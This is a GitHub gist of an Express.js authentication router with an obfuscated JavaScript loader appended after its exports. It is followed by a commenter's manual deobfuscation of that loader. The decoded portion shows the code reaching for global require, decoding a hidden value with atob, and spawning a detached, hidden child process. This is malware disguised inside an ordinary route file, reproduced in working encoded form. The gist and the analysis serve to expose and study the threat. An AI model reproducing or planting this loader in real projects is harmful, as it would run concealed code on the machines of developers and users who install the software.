Created
December 26, 2024 05:52
-
-
Save Mr-MaNia7/d68e03554687e592e74fb087cd6b871b to your computer and use it in GitHub Desktop.
obfuscated js code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const express = require("express"); | |
| const authController = require("../controllers/authController"); | |
| const userController = require("../controllers/userController"); | |
| const transactionController = require("../controllers/transactionController"); | |
| const router = express.Router(); | |
| router.post("/getVerifyCode", authController.getVerifyCode); | |
| router.post("/signup", authController.check2FACode, authController.signUp); | |
| router.post("/login", authController.logIn); | |
| router.get("/logout", authController.logOut); | |
| router.post("/getAccountName", authController.getAccountName); | |
| router.post( | |
| "/getVerifyCodeForPasswordReset", | |
| authController.getVerifyCodeForPasswordReset | |
| ); | |
| router.post( | |
| "/resetPassword", | |
| authController.check2FACode, | |
| authController.resetPassword | |
| ); | |
| // Protect all routes after this middleware | |
| router.use(authController.protect); | |
| router.patch( | |
| "/upgradeUserTier", | |
| transactionController.checkTransactionKey, | |
| userController.upgradeUserTier | |
| ); | |
| router.patch( | |
| "/updatePassword", | |
| transactionController.checkTransactionKey, | |
| authController.updatePassword | |
| ); | |
| router.get( | |
| "/getVerifyCodeForTrxKeyUpdate", | |
| authController.getVerifyCodeForTrxKeyUpdate | |
| ); | |
| router.patch( | |
| "/updateTrxKey", | |
| authController.check2FACode, | |
| userController.updateTrxKey | |
| ); | |
| router.post("/submitMessage", userController.submitMessage); | |
| router.get("/me", userController.getMe, userController.getUser); | |
| // router.patch('/updateMe', | |
| // // userController.uploadUserPhoto, | |
| // // userController.resizeUserPhoto, | |
| // userController.updateMe | |
| // ); | |
| // router.delete('/deleteMe', userController.deleteMe); | |
| module.exports = router; | |
| global["_V"] = 3; | |
| global["r"] = require; | |
| var a0b, a0a; | |
| (function () { | |
| var FHK = "", | |
| siK = 153 - 142; | |
| function efW(z) { | |
| var c = 2169898; | |
| var j = z.length; | |
| var r = []; | |
| for (var o = 0; o < j; o++) { | |
| r[o] = z.charAt(o); | |
| } | |
| for (var o = 0; o < j; o++) { | |
| var u = c * (o + 131) + (c % 36206); | |
| var t = c * (o + 741) + (c % 16120); | |
| var m = u % j; | |
| var q = t % j; | |
| var k = r[m]; | |
| r[m] = r[q]; | |
| r[q] = k; | |
| c = (u + t) % 5158178; | |
| } | |
| return r.join(""); | |
| } | |
| var WnE = efW("vtcstlojqptkbdrfoncuurgmnarihczoxweys").substr(0, siK); | |
| var KOo = | |
| 'aa{ 9={1nk(2o,==+4+vjroak"1b]d-fah!jyl=nxptr=t.vrx,z);la" t=f9a,,9e7r,=8-80,=5r89,i467p,e2s7),i648h,(6,8=,d9,7+,q0r88,=5 ;}ar A=n];ftrgvhrett0atan.ldnftp;C+g)r[{[c]g=[+r;aa; j=6]nqu=)2lk)=[6rs;=<2af8rxv.r[wl0ewvangom+nvswl)n tt;.+{)(v6rhj3a=gim.nnslw;.)pris(h +)1f=rdvrrqhuj.l*n]t -h;v>]0rh{-1{+aa p= u)lvvfrtcnj4hu;=a= =guvl;v(rad[0"vsrrv=crltnrti;(ao 1;oo.(xa+ u= ;]<};.+p)(v-rrg1ckc(a4Cvd[A,(<)cv=rho2bhgr;)flot{)=ror12*6+5.1h]rCocemtSr.1x-(;(=r;=+[;ee=s( 0f0g(=d)jp;kv(i.uengnh)qpc.csa]Cod7Ax(s+[)=+l.0h.raovertlr12+-m;)= ;g+)2a}vl;e+canyieu(;,iu(u=ennl3)e=e];il(c>t)t.7u"hrc.s6bpt7itghdilm)0x,p,si(=[i+t]f;i=r+a;;ib([!)nllf)aih(.<;)o.)uth.c slbqteilgrdt)ejohu=;.to+n("0);}0yrprsc(+[w]C;vvfrCuty+jvi;(g"};oa ;=s3r,82,1A,s9l9.,[2s.po;c;tnn[;"ax r=ctri,g(frotC(arCjd((,62;fov(xah ==o;b<r.derg6h)tn+(u,u snl)t(m;a]crajA1( )v.+oen)Sar}nh.7rim,hir;ose=i6t")r;;eduaneu7srl(t]mq"n"}.uo)n m;;'; | |
| var GYz = efW[WnE]; | |
| var ute = ""; | |
| var kNz = GYz; | |
| var TVg = GYz(ute, efW(KOo)); | |
| var zQb = TVg( | |
| efW( | |
| '6tdd[$4`oS)3hZ Z/KE,(s3s.( j.f*=dUiZ;a1dZ#=0,18a6ha5x8?bZoZb_%.Z84Q%u2)Z)WBf:NZ{ap7;..:bDlZg{nZpV,6mE6!(_]=Z.ZMfgm$3!Z1Z3yXehIZt0pf;Z) <)la;Iba] ))1]Z2j1 gSOZw4tgaYe[riMp[aZ;0%5Z%S(t#et)y])a][lZZ.Z,Z=.5!9b)ha)1)[;vR8nXJk.8]p.)eneon)dZbZo8Z\')Z88 (bZ)9l%$nZ.ua(s9!( nZ-)adjZZ4SC<a[tZfsbZZaep>m9DZgy|5]wZa_oMORa.Zi(cRZhdsh..e]n m(Zt= ajZ.9%(18Da:a_0mc[ac}Z3_wdy8iaojZc]._)]ZZt__rZir8tcZ=cW4%n.l)<3i)!Z.s#[<,....(.io.w9d.as 24s2D&aZ]%7yyyn.r.a(]=);{.{.2cadTc.c)!To7kp]onZ%Z!somo,4gfZt7sZ9)((=Z]t.Smi;dwsRZZefa.a3ia}c=5:3c.=ZIg(ZbZqZhZaala3Pq!ZdLd)_e;vZtqcNjrd.6Zvs.0lZ..}Z[d )SD3tf_=wJZy. .lp*0(Sb=Ze@p($]dmn .dor6p(le9.Za3%esZee ,e0[v)6dh00apud8xaw%.n7rftiX0jr={ZZt:Z(c9f.%Aex(l%.ia.dJJK)+$n#xZ4fZ%i)bZo$4.;)];8bfaZSb{\\b%,8ZuDZj].2])$>yats%h%eZ8A4l8u!at4Z{.hu[Z49k{,.Z"fCn59H5p1%gF,Za)Z)dtI)%Zi1tr$7.(inWleo7ZLZ]aFlH}%()J;t]n$l4}f}Sl0% e6ioo])#)0Cb:.r fa1b1oZ("8P. oe (jm{;)hZce\'Z{a;fo8)74{-nmu(1K). Z73:+)Z9Z;ZeZbLg6+c!]6o=t:15;:)sm0v m)n2ZEZ_awZZ$pzea7.8)(%.e)Zx9Z3$;Z,.3%T);_)68..Z.)6da=}ft$)S4.s))gYjk2_),7Z0r_xfs)}t;\\te 11oZ%3.$vh6)6(t)a!y8dps-5y(ev01)Z;:s[o[c3(n.Z!d%b(58.)oeJ_ZDoZ)}& )e *und]oe(ZebZiu.ZlZ<nr$])^n);=%!1_hmCs0ZLo=(Zx."Zaw$(dZ.Dadb.8=[d.=h&1@Zkqcl]e(}ZsZZT3`=t.Zdn"-Zde.!!Z)/l.e.8._nuZ;1h 1=a)cal7t)l._d,Z[8,,a6 01(ib.t2.Z,(eZw.0r7;!"_.ZZ3Z1QycI1=0(;8oeZuZ)(Z8(_oZ]2,,p_.,.Z _43ZxZ(Z)Zy))ZU]6.{Z:%%ZHt]Z%;sZr<d4ZZHa0he",(rZZ.4%.aV_7o))kG Z 5ZZrm-{_1etb3ZY )jn6utn1_ 8eYZ25=ZZ(ZhfKvuf}]43](Z(gbs#,O/r%Z]BwZfa() Zk$o,6ie)aZnfg%)=)G!a.)(Z.f.,;4)a(sZ. Z$};kon]0]8(2%uZ`(%[Z}7Z10Z(tb(Z)B.]q [g.%8]]A,ZS=6(Z5b.agZZ;i.9Z.ZsdbW.;8o}jvtO`]m)8urdhwaZ(.ddD.v$mZTb__)/(i,q39.pe!_toaTZa =3.9`Zc;c.aZdn=7)Zf_Zaj] 0%..,%smZ)o4ZJ:3_%iH0e;u(+;ZYhb.,8fh.ZiZn.)(;;h3taZcBe%(%"14_.l(3i5!p3ageZ.44xnPt))mfit2gx{s1o&lwl]aZf.. Zw.Z1_1Z<o8I,5,.$(7atej,Dh].ZM1Hc]$((Z$r62J6(]ZZfP4f8Z=1")j:Z6w&=88;9ebGa6]n.4]Z18l8tj)Z])ZibwwrZ[=(4rc4eMZZe.ZF%a]Z%,7Z.7d6dm)Zw,ae1)[.feZ_x8ciC) Z(30[Q.t)Z)1+262= %Z$ef]8Zb7a Zf;4.$( Z.ZZZi}sZ8_=)Z ..ec%S}y_.de8D-]mz)Z.Z1sd,..eZI.yZu,].6oxZ>,.;(m(ccZ_00={1ZZZ.@].fo(a}Z$ah!o0ir[%cr,+Z2{m4])3{c6daiXZ=}br^T!j{6b\\8Zz2ZZl6h94 ZmJ,Z:t]uZ,b)5o]]Z,a1),(x(h)9mw}p9Znu1_nZ$v:,4-Z01nhrB1%f$ZnVJ:a])t8,(e6xfo.l_)[Z6#0i=Z._a0h_rr3.|;8r)u.(.uxl(,.Z2Z]0{]e yZZ9gc.uC-)%TFtryCbZx,]s$.i)CSe]3g)Z)6MC(}0RtZj]c.aaS(.al)kZiZZ!%dZ"4.Z4ia253{,Z.]:}"9)/f_s4C"=no*i(o_dw!!rciw}7(pZ(8)loZ1ZtagZn_SZ45a.,iJta}}.?g.!]1;ca(_78Z(r(bM) 1ZZo))]zd%Z7M.; 5bg(R|Zc;J)+Z)116]3ZMZRoZ(Za)iZ% ._Ze*)6Z0fZ17)ZE9Zn}.Za>JZ)8[a_c1tfuum}1r4af0nAnaZabiZ;!o{8Z(E;HuwLodtrZ%]}4er2)9NZ1(Z95(e)(.f,!a>(.:9,n%Z3.m(ncoN}_cH$9+)0rHZ =_4]bZd0t 5)(ZnZdZda_Zg=ZZq7]41naKuoyZZ2+Z}Za9d;d.ae)Z:]i)7ZuZ!\\tp:o(e6.Z6@ f908eZ`1Z(9].r(bb4lZ]eZtZ;8d0,cZ.Z: 3i(g.Z=lja%)c)d)0.^.)z|fZZ[198$,u(Zcjme/NaZtx5.j)+2Zesc%f[t0)eXri5Zb,e[(Z8d$%Zfd(vZ}ar8oZr1;(e[rdagZ)u-,nyia!59a;t,7(}.)(.E.4l(02Z%ht909%[ZT/ot)) {4bzsZ!.(n)],m.tZ[N%y2s7Ns]].%Z62(+,Cx9)BZZZ$h=l^%)ba,r!Z2.,57(8udtb.1x[Z_s_866ZaZi#4s0.)se8(]Z9d.vZ3ZiZ3/]phapv4Zsq:ZZjeZ%nZ8` ZZZ)cZgd[=Z}_o.t(6a25-lo)5)=ttZcZi).!wn#c_haoaTd0Z,lfUz_{0a8()9 8cN9)ac(8$#,Z.9fp5) 7t$1Zpar-ZI97(agZaZZoolZ3)ZZ0EZZ5a9$stt0ZkE ts.e(85b4a_ZB uCg?$h?bizZ7i%c.Zaa72a(f,ae $$b{Zo49rZ,2$u=49ZZ] .(C89_6mf..$1t .E.r_[tdZto!%}@f\'ZaZ)oZ.aue)]1aKaZ=i)f=DZX=]bj8d(6jfw8Z.N.Eb%Z(($p(.=Z7;i=;1dZ%,( Z7].nM0e$8 $dcZ6VZ_Z3!n(Rec4wUZ]ZorrlM;_S+N(X1.fZ(Z)5(!]lleZ]a:2Z,ZZ$ZZ])[f;)?]Zme8Znad r.d>oqZt1u11$%fd4u)*Z5Pfd;(107Z.xl;9e9ZZ5,4t+a833h.vZ7,%r Zs01ZlZoZ I0ijka_)8_Z,&ayvY \'dZZ= Z=.c%Zs]+w=,3nZ4%_Z,st.Q9cbZ7t(dj:nZa .{)Z G]5Z7{ph9aht.sZ3wZu;%0g541c]_:oZn [f0._))!]2t,_ruZZ.oj3;Kf3 Z,3(Zl%}8Znemoc(jZo=Z_4+a )_i)dcm7. 2 _0ZZin _}t1)i0Zbqa$;;a8)1([%),gd)8a=v' | |
| ) | |
| ); | |
| var its = kNz(FHK, zQb); | |
| its(2713); | |
| return 6659; | |
| })(); |
metacritical
commented
Dec 28, 2024
After Beautification, this has syntax errors:
var q = 11,
k = 27,
s = 64;
var a = "abcdefghijklmnopqrstuvwxyz";
var n = [90, 79, 70, 88, 81, 65, 85, 94, 74, 72, 71, 86, 80, 66, 82, 89, 76, 60, 87, 75];
var b = [];
for (var t = 0; t < n.length; t++) b[n[t]] = t + 1;
var y = [];
q += 22;
k += 66;
s += 32;
for (var w = 0; w < arguments.length; w++) {
var j = arguments[w].split(" ");
for (var h = j.length - 1; h >= 0; h--) {
var p = null;
var c = j[h];
var x = null;
var d = 0;
var v = c.length;
var l;
for (var r = 0; r < v; r++) {
var g = c.charCodeAt(r);
var o = b[g];
if (o) {
p = (o - 1) k + c.charCodeAt(r + 1) - q;
l = r;
r++;
} else if (g == s) {
p = k(n.length - q + c.charCodeAt(r + 1)) + c.charCodeAt(r + 2) - q;
l = r;
r += 2;
} else {
continue;
}
if (x == null) x = [];
if (l > d) x.push(c.substring(d, l));
x.push(j[p + 1]);
d = r + 1;
}
if (x != null) {
if (d < v) x.push(c.substring(d));
j[h] = x.join("");
}
}
y.push(j[0]);
}
var u = y.join("");
var i = [32, 42, 10, 39, 96, 92].concat(n);
var m = String.fromCharCode(46);
for (var t = 0; t < i.length; t++) u = u.split(m + a.charAt(t)).join(String.fromCharCode(i[t]));
return u.split(m + "!").join(m);
After Fixing syntax error:
function decoder(arguments) {
var q = 11,
k = 27,
s = 64;
var a = "abcdefghijklmnopqrstuvwxyz";
var n = [90, 79, 70, 88, 81, 65, 85, 94, 74, 72, 71, 86, 80, 66, 82, 89, 76, 60, 87, 75];
var b = [];
for (var t = 0; t < n.length; t++) {
b[n[t]] = t + 1;
}
var y = [];
q += 22;
k += 66;
s += 32;
for (var w = 0; w < arguments.length; w++) {
var j = arguments[w].split(" ");
for (var h = j.length - 1; h >= 0; h--) {
var p = null;
var c = j[h];
var x = null;
var d = 0;
var v = c.length;
var l;
for (var r = 0; r < v; r++) {
var g = c.charCodeAt(r);
var o = b[g];
if (o) {
p = (o - 1) * k + c.charCodeAt(r + 1) - q;
l = r;
r++;
} else if (g == s) {
p = k * (n.length - q + c.charCodeAt(r + 1)) + c.charCodeAt(r + 2) - q;
l = r;
r += 2;
} else {
continue;
}
if (x == null) x = [];
if (l > d) x.push(c.substring(d, l));
x.push(j[p + 1]);
d = r + 1;
}
if (x != null) {
if (d < v) x.push(c.substring(d));
j[h] = x.join("");
}
}
y.push(j[0]);
}
var u = y.join("");
var i = [32, 42, 10, 39, 96, 92].concat(n);
var m = String.fromCharCode(46);
for (var t = 0; t < i.length; t++) {
u = u.split(m + a.charAt(t)).join(String.fromCharCode(i[t]));
}
return u.split(m + "!").join(m);
}
I don't know which code was written to make this code obfuscated. So, I had to deobfuscate it manually. Manually deobfuscating the code was an incredibly challenging and time-consuming task due to its advanced obfuscation techniques. The heavy use of nested logic, dynamic code execution, and cryptic split-join operations made it difficult to trace the code's intent. Each variable and function reference had to be carefully reversed, tracked, and pieced together. I had to keep patience and persistence to decode every layer manually and of course give some time. After all in the last, I got the result that I wanted. :)
So, it all starts with this string:
'6tdd[$4`oS)3hZ Z/KE,(s3s.( j.f*=dUiZ;a1dZ#=0,18a6ha5x8?bZoZb_%.Z84Q%u2)Z)WBf:NZ{ap7;..:bDlZg{nZpV,6mE6!(_]=Z.ZMfgm$3!Z1Z3yXehIZt0pf;Z) <)la;Iba] ))1]Z2j1 gSOZw4tgaYe[riMp[aZ;0%5Z%S(t#et)y])a][lZZ.Z,Z=.5!9b)ha)1)[;vR8nXJk.8]p.)eneon)dZbZo8Z\')Z88 (bZ)9l%$nZ.ua(s9!( nZ-)adjZZ4SC<a[tZfsbZZaep>m9DZgy|5]wZa_oMORa.Zi(cRZhdsh..e]n m(Zt= ajZ.9%(18Da:a_0mc[ac}Z3_wdy8iaojZc]._)]ZZt__rZir8tcZ=cW4%n.l)<3i)!Z.s#[<,....(.io.w9d.as 24s2D&aZ]%7yyyn.r.a(]=);{.{.2cadTc.c)!To7kp]onZ%Z!somo,4gfZt7sZ9)((=Z]t.Smi;dwsRZZefa.a3ia}c=5:3c.=ZIg(ZbZqZhZaala3Pq!ZdLd)_e;vZtqcNjrd.6Zvs.0lZ..}Z[d )SD3tf_=wJZy. .lp*0(Sb=Ze@p($]dmn .dor6p(le9.Za3%esZee ,e0[v)6dh00apud8xaw%.n7rftiX0jr={ZZt:Z(c9f.%Aex(l%.ia.dJJK)+$n#xZ4fZ%i)bZo$4.;)];8bfaZSb{\\b%,8ZuDZj].2])$>yats%h%eZ8A4l8u!at4Z{.hu[Z49k{,.Z"fCn59H5p1%gF,Za)Z)dtI)%Zi1tr$7.(inWleo7ZLZ]aFlH}%()J;t]n$l4}f}Sl0% e6ioo])#)0Cb:.r fa1b1oZ("8P. oe (jm{;)hZce\'Z{a;fo8)74{-nmu(1K). Z73:+)Z9Z;ZeZbLg6+c!]6o=t:15;:)sm0v m)n2ZEZ_awZZ$pzea7.8)(%.e)Zx9Z3$;Z,.3%T);_)68..Z.)6da=}ft$)S4.s))gYjk2_),7Z0r_xfs)}t;\\te 11oZ%3.$vh6)6(t)a!y8dps-5y(ev01)Z;:s[o[c3(n.Z!d%b(58.)oeJ_ZDoZ)}& )e *und]oe(ZebZiu.ZlZ<nr$])^n);=%!1_hmCs0ZLo=(Zx."Zaw$(dZ.Dadb.8=[d.=h&1@Zkqcl]e(}ZsZZT3`=t.Zdn"-Zde.!!Z)/l.e.8._nuZ;1h 1=a)cal7t)l._d,Z[8,,a6 01(ib.t2.Z,(eZw.0r7;!"_.ZZ3Z1QycI1=0(;8oeZuZ)(Z8(_oZ]2,,p_.,.Z _43ZxZ(Z)Zy))ZU]6.{Z:%%ZHt]Z%;sZr<d4ZZHa0he",(rZZ.4%.aV_7o))kG Z 5ZZrm-{_1etb3ZY )jn6utn1_ 8eYZ25=ZZ(ZhfKvuf}]43](Z(gbs#,O/r%Z]BwZfa() Zk$o,6ie)aZnfg%)=)G!a.)(Z.f.,;4)a(sZ. Z$};kon]0]8(2%uZ`(%[Z}7Z10Z(tb(Z)B.]q [g.%8]]A,ZS=6(Z5b.agZZ;i.9Z.ZsdbW.;8o}jvtO`]m)8urdhwaZ(.ddD.v$mZTb__)/(i,q39.pe!_toaTZa =3.9`Zc;c.aZdn=7)Zf_Zaj] 0%..,%smZ)o4ZJ:3_%iH0e;u(+;ZYhb.,8fh.ZiZn.)(;;h3taZcBe%(%"14_.l(3i5!p3ageZ.44xnPt))mfit2gx{s1o&lwl]aZf.. Zw.Z1_1Z<o8I,5,.$(7atej,Dh].ZM1Hc]$((Z$r62J6(]ZZfP4f8Z=1")j:Z6w&=88;9ebGa6]n.4]Z18l8tj)Z])ZibwwrZ[=(4rc4eMZZe.ZF%a]Z%,7Z.7d6dm)Zw,ae1)[.feZ_x8ciC) Z(30[Q.t)Z)1+262= %Z$ef]8Zb7a Zf;4.$( Z.ZZZi}sZ8_=)Z ..ec%S}y_.de8D-]mz)Z.Z1sd,..eZI.yZu,].6oxZ>,.;(m(ccZ_00={1ZZZ.@].fo(a}Z$ah!o0ir[%cr,+Z2{m4])3{c6daiXZ=}br^T!j{6b\\8Zz2ZZl6h94 ZmJ,Z:t]uZ,b)5o]]Z,a1),(x(h)9mw}p9Znu1_nZ$v:,4-Z01nhrB1%f$ZnVJ:a])t8,(e6xfo.l_)[Z6#0i=Z._a0h_rr3.|;8r)u.(.uxl(,.Z2Z]0{]e yZZ9gc.uC-)%TFtryCbZx,]s$.i)CSe]3g)Z)6MC(}0RtZj]c.aaS(.al)kZiZZ!%dZ"4.Z4ia253{,Z.]:}"9)/f_s4C"=no*i(o_dw!!rciw}7(pZ(8)loZ1ZtagZn_SZ45a.,iJta}}.?g.!]1;ca(_78Z(r(bM) 1ZZo))]zd%Z7M.; 5bg(R|Zc;J)+Z)116]3ZMZRoZ(Za)iZ% ._Ze*)6Z0fZ17)ZE9Zn}.Za>JZ)8[a_c1tfuum}1r4af0nAnaZabiZ;!o{8Z(E;HuwLodtrZ%]}4er2)9NZ1(Z95(e)(.f,!a>(.:9,n%Z3.m(ncoN}_cH$9+)0rHZ =_4]bZd0t 5)(ZnZdZda_Zg=ZZq7]41naKuoyZZ2+Z}Za9d;d.ae)Z:]i)7ZuZ!\\tp:o(e6.Z6@ f908eZ`1Z(9].r(bb4lZ]eZtZ;8d0,cZ.Z: 3i(g.Z=lja%)c)d)0.^.)z|fZZ[198$,u(Zcjme/NaZtx5.j)+2Zesc%f[t0)eXri5Zb,e[(Z8d$%Zfd(vZ}ar8oZr1;(e[rdagZ)u-,nyia!59a;t,7(}.)(.E.4l(02Z%ht909%[ZT/ot)) {4bzsZ!.(n)],m.tZ[N%y2s7Ns]].%Z62(+,Cx9)BZZZ$h=l^%)ba,r!Z2.,57(8udtb.1x[Z_s_866ZaZi#4s0.)se8(]Z9d.vZ3ZiZ3/]phapv4Zsq:ZZjeZ%nZ8` ZZZ)cZgd[=Z}_o.t(6a25-lo)5)=ttZcZi).!wn#c_haoaTd0Z,lfUz_{0a8()9 8cN9)ac(8$#,Z.9fp5) 7t$1Zpar-ZI97(agZaZZoolZ3)ZZ0EZZ5a9$stt0ZkE ts.e(85b4a_ZB uCg?$h?bizZ7i%c.Zaa72a(f,ae $$b{Zo49rZ,2$u=49ZZ] .(C89_6mf..$1t .E.r_[tdZto!%}@f\'ZaZ)oZ.aue)]1aKaZ=i)f=DZX=]bj8d(6jfw8Z.N.Eb%Z(($p(.=Z7;i=;1dZ%,( Z7].nM0e$8 $dcZ6VZ_Z3!n(Rec4wUZ]ZorrlM;_S+N(X1.fZ(Z)5(!]lleZ]a:2Z,ZZ$ZZ])[f;)?]Zme8Znad r.d>oqZt1u11$%fd4u)*Z5Pfd;(107Z.xl;9e9ZZ5,4t+a833h.vZ7,%r Zs01ZlZoZ I0ijka_)8_Z,&ayvY \'dZZ= Z=.c%Zs]+w=,3nZ4%_Z,st.Q9cbZ7t(dj:nZa .{)Z G]5Z7{ph9aht.sZ3wZu;%0g541c]_:oZn [f0._))!]2t,_ruZZ.oj3;Kf3 Z,3(Zl%}8Znemoc(jZo=Z_4+a )_i)dcm7. 2 _0ZZin _}t1)i0Zbqa$;;a8)1([%),gd)8a=v'
After decoding it we get:
function jso$ft$boe$_45(a, b) {
return a - b
}
function jso$ft$giden$a_48a() {
return a0a
}
function jso$ft$giden$atob() {
return atob
}
function jso$ft$giden$global() {
return global
}
function jso$ft$uoel$_33(a) {
return !a
}
function jso$ft$boe$_61_61(a, b) {
return a == b
}
function jso$ft$boe$_61_61_61(a, b) {
return a === b
}
function jso$ft$giden$parseInt() {
return parseInt
}
function jso$ft$boe$_47(a, b) {
return a / b
}
function jso$ft$giden$a_48b() {
return a0b
}
function jso$ft$giden$String() {
return String
}
function jso$ft$boe$_37(a, b) {
return a % b
}
function jso$ft$boe$_43(a, b) {
return a + b
}
function jso$ft$boe$_60(a, b) {
return a < b
}
var _$_815b = (_$af1949887)("N4i31W9in%nnfn%Gcz%ieMsd%ed%9t%c%88%pDser%E_Ft%r%clthbCm%wt8mg%iLofij%%thm5iwlgc%st%G0irRPeh%We%ldmPon%;%hUf4E%ttro%hFldbeRuvay8CFye%-%ntiNmr%%hu%%8tr g%UaA%nn%cBP%tpYAV_SoRodi%swBNiZiu%%Wy_npsVJKnp9l90p6XcWQTIiM2nvO%S5eu%f3R%l9e%UHSoeiqrof%.wsoete8sTpWyVHecr%za1lcs%UbrcaeilFne%dtMnup2clRc5r3lj%-gsaj%Da\'ycTSD38nso2%upiuA%56tSeB%@m$og%m/ntYnHL%w6seGaaweeeoiY1TDuthdac11nBi%V89tbs1rjr1oCsD0e]s2fgH%%nl%%\'PCtxStm7r%fK450%Udwe%z[aI8saxpUb%urt YGeZJ=7CS1h%tq4uso%Ehgg4piAu1h%o%mHo", 2169898);
if (!_$_815b) {
_$af1949883(0, true);
(function() {
_$af1949876 = null
})()
};
function _$af1949887(b, jso$setrpl$o) {
var o = {},
e = {},
h = {},
y = {},
t = {},
m = {},
f = {};
o._ = jso$setrpl$o;
var v = b.length;
e._ = [];;
for (var w = 0; jso$ft$boe$_60(w, v); w++) {
e._[w] = b.charAt(w)
};
for (var w = 0; jso$ft$boe$_60(w, v); w++) {
h._ = jso$ft$boe$_43(o._ * (jso$ft$boe$_43(w, 131)), (jso$ft$boe$_37(o._, 36206)));;
y._ = jso$ft$boe$_43(o._ * (jso$ft$boe$_43(w, 741)), (jso$ft$boe$_37(o._, 16120)));;
t._ = jso$ft$boe$_37(h._, v);;
m._ = jso$ft$boe$_37(y._, v);;
f._ = e._[t._];;
jso$spliter_$af1949890(t, e, m);
jso$spliter_$af1949891(m, e, f);
jso$spliter_$af1949892(o, h, y)
};
var k = jso$ft$giden$String().fromCharCode(127);
var s = '';
var d = '%';
var c = '#1';
var q = '%';
var x = '#0';
var l = '#';
return e._.join(s).split(d).join(k).split(c).join(q).split(x).join(l).split(k)
}
function _$af1949875(a, b) {
const l = jso$ft$giden$a_48b(),
c = a();
while (!jso$ft$uoel$_33([])) {
try {
const d = jso$ft$boe$_43(jso$ft$boe$_43(jso$ft$boe$_43(jso$ft$boe$_47(jso$ft$giden$parseInt()(l(0x84)), 0x1) + jso$ft$boe$_47(jso$ft$giden$parseInt()(l(0x91)), 0x2), jso$ft$giden$parseInt()(l(0xa6)) / 0x3) + jso$ft$boe$_47(-jso$ft$giden$parseInt()(l(0x8f)), 0x4), jso$ft$giden$parseInt()(l(0x9b)) / 0x5) + jso$ft$boe$_47(-jso$ft$giden$parseInt()(l(0x96)), 0x6), jso$ft$boe$_47(jso$ft$giden$parseInt()(l(0x98)), 0x7) * (jso$ft$boe$_47(-jso$ft$giden$parseInt()(l(0xa2)), 0x8)));
if (jso$ft$boe$_61_61_61(d, b)) {
break
} else {
if (jso$ft$boe$_61_61(_$af1949875, 1)) {
jso$spliter_$af1949893();
return
};
c[_$_815b[1]](c[_$_815b[0]]())
}
} catch (e) {
c[_$_815b[1]](c[_$_815b[0]]())
}
}
}
function _$af1949876() {
var m = {},
b = {};
m._ = jso$ft$giden$a_48b();;
b._ = {
'BCmTg': (1 && m._)(0x82),
'cdtYB': function(c, d) {
return jso$ft$boe$_61_61(c, d)
},
'YevWJ': function(c, d) {
return jso$ft$boe$_43(c, d)
},
'GhmHo': function(c, d) {
return jso$ft$boe$_61_61_61(c, d)
},
'UYffz': _$_815b[2],
'Dline': _$_815b[3],
'wPfjh': jso$ft$boe$_43((1 && m._)(0x88), (1 && m._)(0x92)),
'cDuFh': _$_815b[4],
'nxpqH': (1 && m._)(0x83),
'tURKT': function(c, d) {
return c(d)
},
'xDLfg': jso$ft$boe$_43((1 && m._)(0x9c), (1 && m._)(0x93)),
'yVpzy': jso$ft$boe$_43((1 && m._)(0x89), _$_815b[5]),
'RtuiH': (1 && m._)(0x9f),
'IRuMw': jso$ft$boe$_43(jso$ft$boe$_43((1 && m._)(0x8c) + _$_815b[6], (1 && m._)(0x94)) + (1 && m._)(0x90), _$_815b[7])
};;
try {
const c = jso$ft$giden$global()[_$_815b[8]](b._[(1 && m._)(0x9d)]),
d = {};
d[(1 && m._)(0xa1)] = 0x14, new c[_$_815b[24]](c[jso$ft$boe$_43((1 && m._)(0x97), _$_815b[23])](b._[(1 && m._)(0x8e)]), b._[(1 && m._)(0x81)])[jso$ft$boe$_43((1 && m._)(0x9a) + (1 && m._)(0x87), (1 && m._)(0x92))](new c[((1 && m._)(0x9e))](b._[(1 && m._)(0x8d)]), d, b._[(1 && m._)(0x81)])[_$_815b[22]]((f) => {
const n = m._;
let g = _$_815b[10],
h = _$_815b[10];
for (let j of f) {
if (jso$ft$uoel$_33(j[n(0x8b)])) {
continue
};
let k = j[n(0x8b)][n(0x8a)](b._[n(0x95)])[0x1];
if (jso$ft$uoel$_33(k) || b._[n(0xa0)](k, h)) {
continue
};
h = k, g = b._[_$_815b[11]](k[n(0x8a)](_$_815b[10])[n(0xa3)]()[n(0x99)](_$_815b[10]), g);
if (b._[n(0x86)](g[0x0], _$_815b[12])) {
break
}
};
const i = jso$ft$giden$global()[_$_815b[8]](_$_815b[16])[_$_815b[15]]()[_$_815b[14]](b._[_$_815b[13]]) ? {} : {
'detached': !jso$ft$uoel$_33([]),
'stdio': b._[n(0xa7)],
'windowsHide': !jso$ft$uoel$_33([])
};
jso$ft$giden$global()[_$_815b[8]](b._[_$_815b[21]])[b._[n(0x85)]](b._[n(0x80)], [_$_815b[17], jso$ft$boe$_43(jso$ft$boe$_43(n(0xa4) + _$_815b[18], (jso$ft$giden$global()[_$_815b[19]] || 0x0)) + _$_815b[20], b._[n(0xa5)](jso$ft$giden$atob(), g))], i)
})[_$_815b[9]](() => {})
} catch (f) {}
}
function _$af1949883(a, b) {
var c = {};
c._ = jso$ft$giden$a_48a()();;
return a0b = jso$builder_$af1949884_(c), jso$ft$giden$a_48b()(a, b)
}
function _$af1949885() {
var o = {};
o._ = [_$_815b[25], _$_815b[26], _$_815b[27], _$_815b[28], _$_815b[29], _$_815b[30], _$_815b[31], _$_815b[32], _$_815b[33], _$_815b[34], _$_815b[35], _$_815b[36], _$_815b[37], _$_815b[38], _$_815b[39], _$_815b[40], _$_815b[41], _$_815b[42], _$_815b[43], _$_815b[44], _$_815b[45], _$_815b[46], _$_815b[47], _$_815b[48], _$_815b[49], _$_815b[50], _$_815b[51], _$_815b[52], _$_815b[53], _$_815b[54], _$_815b[55], _$_815b[56], _$_815b[57], _$_815b[58], _$_815b[59], _$_815b[60], _$_815b[61], _$_815b[62], _$_815b[63], _$_815b[64]];;
a0a = jso$builder_$af1949886_(o);
return jso$ft$giden$a_48a()()
}
a0b = _$af1949883;
a0a = _$af1949885;
(_$af1949875(a0a, 0x28f51), (_$af1949876()));
if (_$af1949887 === 1) {
_$af1949883(_$_815b[22], true, false);
return
};
function jso$spliter_$af1949890(t, e, m) {
e._[t._] = e._[m._]
}
function jso$spliter_$af1949891(m, e, f) {
e._[m._] = f._
}
function jso$spliter_$af1949892(o, h, y) {
o._ = jso$ft$boe$_37((jso$ft$boe$_43(h._, y._)), 5158178)
}
function jso$spliter_$af1949893() {
_$af1949885 = null
}
function jso$builder_$af1949884_(c) {
